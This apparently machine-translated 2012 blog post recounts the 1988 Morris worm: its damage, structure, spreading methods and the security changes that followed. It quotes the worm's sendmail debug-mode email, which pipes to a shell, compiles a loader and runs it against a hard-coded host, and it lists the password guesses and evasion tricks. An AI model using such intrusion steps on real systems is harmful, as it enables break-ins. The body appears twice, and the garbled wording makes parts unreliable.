November 26, 2012 at 23:54Morris worm - he was the first
On November 2, 1988, the ARPANET network was attacked by a program that later became known as the Morris Worm — named after its creator, Cornell University student Robert Morris Jr. The ARPANET (Advanced Research Projects Agency Network) was created in 1969 at the initiative of the Department of Advanced Studies of the US Department of Defense (DARPA, Defense Advanced Research Projects Agency) and was the prototype of the Internet. This network was created in the interests of researchers in the field of computer engineering and technology for messaging, as well as programs and data arrays between the largest research centers, laboratories, universities, government organizations and private firms working in the interests of the US Department of Defense (DoD, Department of Defense of USA). It was under the order of DoD that one of the three most common transport layer protocols of the OSI model was developed, called TCP / IP, which in 1983 became the main one in ARPANET. By the end of the 80s, the network totaled several tens of thousands of computers. ARPANET ceased to exist in June 1990.
Morris Worm was the first example of malware in the history of the development of computer technology that used automatic distribution mechanisms over the network. To do this, several vulnerabilities of network services were used, as well as some weaknesses in computer systems due to insufficient attention to security issues at that time.
According to Robert Morris, the worm was created for research purposes. Its code did not contain any “payload” (destructive functions). However, due to errors in the operation algorithms, the spread of the worm provoked the so-called “denial of service” when computers were busy making numerous copies of the worm and stopped responding to operator commands. Morris Worm practically paralyzed the work of computers on the ARPANET network for up to five days. Assessment of downtime - at least 8 million hours and over 1 million hours of time spent on restoring systems. Total losses in monetary terms were estimated at 98 million dollars, they consisted of their direct and indirect losses.
Direct losses included ($ 32 million):
stopping, testing and rebooting 42700 machines;
worm identification, deletion, cleaning of memory and restoration of health of 6200 machines;
worm code analysis, disassembly and documentation;
Unix system repair and testing.
Indirect losses included ($ 66 million):
loss of computer time due to lack of access to the network;
loss of user access to the network.
However, these estimates must be taken very, very carefully.
Structurally, the worm consisted of three parts - the “head” and two “tails”. The “head” was the C source code (99 lines) and compiled directly on the remote machine. The “tails” were identical, in terms of source code and algorithms, binary files, but compiled for different types of architectures. According to Morris, VAX and SUN were chosen as the target hardware platforms. The "head" was cast using the following methods:
Sendmail is the oldest network service that processes the reception and sending of mail via SMTP. In the days of the worm spreading, Sendmail had an undocumented feature - the developers programmed a debug mode that should not have been in the working version of the program and was left by mistake. One of the features of debug mode was that the mail message was not processed by Sendmail itself, but by another program. Example of a worm email :
debug
mail from:
rcptto: <"| sed-e '1, / ^ $ / d' | / bin / sh; exit 0">
data
cd / usr / tmp
cat> x14481910.с < <'EOF'
<program text l1.c>
EOF
cc -o x14481910 x14481910.s; x14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c
.
quit
As you can see, the headers were removed from the body of the message (using the sed text preprocessor) and the “head” source code file was saved. Further, the command processor was given instructions to compile the “head” code, launch the resulting executable file, and erase temporary files.
To exploit the fingerd service vulnerability, the worm transmitted a specially prepared string of 536 bytes, which ultimately called the execve function ("/ bin / sh", 0, 0). This worked only for VAX computers with installed 4.3BSD OS; on SunOS-based SUN computers, this vulnerability was not found.
To use the distribution method through rexec and rsh, a list of users on the local machine was collected. Based on it, the most frequently used passwords were selected, in the hope that many users have the same names and passwords on all machines on the network, which, however, turned out to be not far from the truth. In addition to selection in rsh, a trust mechanism was used, or another mechanism for simplified authentication by the IP address of a remote machine. Such addresses were stored in the /etc/hosts.equiv and .rhosts files. For most computers, the trust was mutual, so with a high degree of probability, the list of IP addresses from these files found by the worm made it possible to log into the remote system via rsh without using a password.
When selecting the worm, I tried the following password options:
The combined use of several distribution methods has significantly affected the mass distribution of the worm on the network. To search for remote computers, a network scan was performed based on information from the route table and the own IP address of the infected system.
The worm used several tricks to make it difficult for computer administrators to detect it:
Despite the “grandeur” of the idea, the worm had some errors in it, both design and implementation. It is the incorrectly implemented algorithm for checking whether the system is already infected, led to the mass distribution of the worm on the network, contrary to the idea of its author. In practice, computers were infected multiple times, which, firstly, led to the rapid exhaustion of resources, and secondly, contributed to the avalanche-like spread of the worm on the network. According to some estimates, the Morris worm infected about 6,200 computers. The developer himself, realizing the scale of the results of his act, voluntarily surrendered to the authorities and told about everything. The hearing on his case ended on January 22, 1990. Initially, Morris faced up to five years in prison and a fine of $ 25 thousand. In fact, the sentence was rather soft,
The incident with the Morris Worm made IT specialists seriously think about security issues, in particular, after that, to increase the security of the system, pauses were introduced after incorrect password entry and storing passwords in / etc / shadow, where they were transferred from read-only all users of the / etc / passwd file. But the most important event was the creation in November 1988 of the CERT Coordination Center (CERT / CC), whose activities are related to solving Internet security problems. The first CERT security bulletin to appear in December 1988 was the report of vulnerabilities exploited by the worm. It is noteworthy that many of the technical solutions used by the Morris Worm, such as using password brute force, compilation of bootloader code on a remote computer running * NIX systems (Slapper), network scanning to detect targets, etc. They are also used in modern malware samples.
Interestingly, in the same 1988, the well-known programmer Peter Norton spoke rather sharply in the press against the very fact of the existence of computer viruses, calling them a "myth" and comparing the noise around this topic with "stories about crocodiles living in New York's sewers." Just two years after Norton’s statement, in 1990, the first version of the Norton AntiVirus antivirus program was released.
And finally - in 1988, being impressed by the attack of the Morris worm, the American Computer Equipment Association declared November 30 as the International Information Security Day, which is celebrated to this day.
Morris Worm was the first example of malware in the history of the development of computer technology that used automatic distribution mechanisms over the network. To do this, several vulnerabilities of network services were used, as well as some weaknesses in computer systems due to insufficient attention to security issues at that time.
According to Robert Morris, the worm was created for research purposes. Its code did not contain any “payload” (destructive functions). However, due to errors in the operation algorithms, the spread of the worm provoked the so-called “denial of service” when computers were busy making numerous copies of the worm and stopped responding to operator commands. Morris Worm practically paralyzed the work of computers on the ARPANET network for up to five days. Assessment of downtime - at least 8 million hours and over 1 million hours of time spent on restoring systems. Total losses in monetary terms were estimated at 98 million dollars, they consisted of their direct and indirect losses.
Direct losses included ($ 32 million):
stopping, testing and rebooting 42700 machines;
worm identification, deletion, cleaning of memory and restoration of health of 6200 machines;
worm code analysis, disassembly and documentation;
Unix system repair and testing.
Indirect losses included ($ 66 million):
loss of computer time due to lack of access to the network;
loss of user access to the network.
However, these estimates must be taken very, very carefully.
Structurally, the worm consisted of three parts - the “head” and two “tails”. The “head” was the C source code (99 lines) and compiled directly on the remote machine. The “tails” were identical, in terms of source code and algorithms, binary files, but compiled for different types of architectures. According to Morris, VAX and SUN were chosen as the target hardware platforms. The "head" was cast using the following methods:
- use of debug mode in sendmail;
- exploitation of a buffer overflow vulnerability in the fingerd network service;
- selection of login and password for remote execution of programs (rexec);
- calling the remote shell (rsh) by selecting a username and password or using the trust mechanism.
Sendmail is the oldest network service that processes the reception and sending of mail via SMTP. In the days of the worm spreading, Sendmail had an undocumented feature - the developers programmed a debug mode that should not have been in the working version of the program and was left by mistake. One of the features of debug mode was that the mail message was not processed by Sendmail itself, but by another program. Example of a worm email :
debug
mail from:
rcptto: <"| sed-e '1, / ^ $ / d' | / bin / sh; exit 0">
data
cd / usr / tmp
cat> x14481910.с < <'EOF'
<program text l1.c>
EOF
cc -o x14481910 x14481910.s; x14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c
.
quit
As you can see, the headers were removed from the body of the message (using the sed text preprocessor) and the “head” source code file was saved. Further, the command processor was given instructions to compile the “head” code, launch the resulting executable file, and erase temporary files.
To exploit the fingerd service vulnerability, the worm transmitted a specially prepared string of 536 bytes, which ultimately called the execve function ("/ bin / sh", 0, 0). This worked only for VAX computers with installed 4.3BSD OS; on SunOS-based SUN computers, this vulnerability was not found.
To use the distribution method through rexec and rsh, a list of users on the local machine was collected. Based on it, the most frequently used passwords were selected, in the hope that many users have the same names and passwords on all machines on the network, which, however, turned out to be not far from the truth. In addition to selection in rsh, a trust mechanism was used, or another mechanism for simplified authentication by the IP address of a remote machine. Such addresses were stored in the /etc/hosts.equiv and .rhosts files. For most computers, the trust was mutual, so with a high degree of probability, the list of IP addresses from these files found by the worm made it possible to log into the remote system via rsh without using a password.
When selecting the worm, I tried the following password options:
- empty;
- user name (user);
- reverse username (resu);
- duplicate username (useruser);
- User’s first or last name (John, Smith);
- user name or surname in lower case (john, smith);
- built-in dictionary of 432 words;
- file / usr / dict / words, containing about 24,000 words and used in the 4.3BSD system (and others) as a spelling dictionary. If the word begins with a capital letter, then the variant with a lower case letter was also checked.
The combined use of several distribution methods has significantly affected the mass distribution of the worm on the network. To search for remote computers, a network scan was performed based on information from the route table and the own IP address of the infected system.
The worm used several tricks to make it difficult for computer administrators to detect it:
- delete your executable file after launch;
- all error messages were disabled, and the size of the crash dump was set to zero;
- the worm's executable file was saved under the name sh, the same name was used by the Bourne Shell shell, so the worm was masked in the list of processes;
- approximately every three minutes a child thread was generated, and the parent was terminated, while the pid of the worm process was constantly changing and the running time shown in the process list was reset;
- all text strings were encoded using the xor 81h operation.
Despite the “grandeur” of the idea, the worm had some errors in it, both design and implementation. It is the incorrectly implemented algorithm for checking whether the system is already infected, led to the mass distribution of the worm on the network, contrary to the idea of its author. In practice, computers were infected multiple times, which, firstly, led to the rapid exhaustion of resources, and secondly, contributed to the avalanche-like spread of the worm on the network. According to some estimates, the Morris worm infected about 6,200 computers. The developer himself, realizing the scale of the results of his act, voluntarily surrendered to the authorities and told about everything. The hearing on his case ended on January 22, 1990. Initially, Morris faced up to five years in prison and a fine of $ 25 thousand. In fact, the sentence was rather soft,
The incident with the Morris Worm made IT specialists seriously think about security issues, in particular, after that, to increase the security of the system, pauses were introduced after incorrect password entry and storing passwords in / etc / shadow, where they were transferred from read-only all users of the / etc / passwd file. But the most important event was the creation in November 1988 of the CERT Coordination Center (CERT / CC), whose activities are related to solving Internet security problems. The first CERT security bulletin to appear in December 1988 was the report of vulnerabilities exploited by the worm. It is noteworthy that many of the technical solutions used by the Morris Worm, such as using password brute force, compilation of bootloader code on a remote computer running * NIX systems (Slapper), network scanning to detect targets, etc. They are also used in modern malware samples.
Interestingly, in the same 1988, the well-known programmer Peter Norton spoke rather sharply in the press against the very fact of the existence of computer viruses, calling them a "myth" and comparing the noise around this topic with "stories about crocodiles living in New York's sewers." Just two years after Norton’s statement, in 1990, the first version of the Norton AntiVirus antivirus program was released.
And finally - in 1988, being impressed by the attack of the Morris worm, the American Computer Equipment Association declared November 30 as the International Information Security Day, which is celebrated to this day.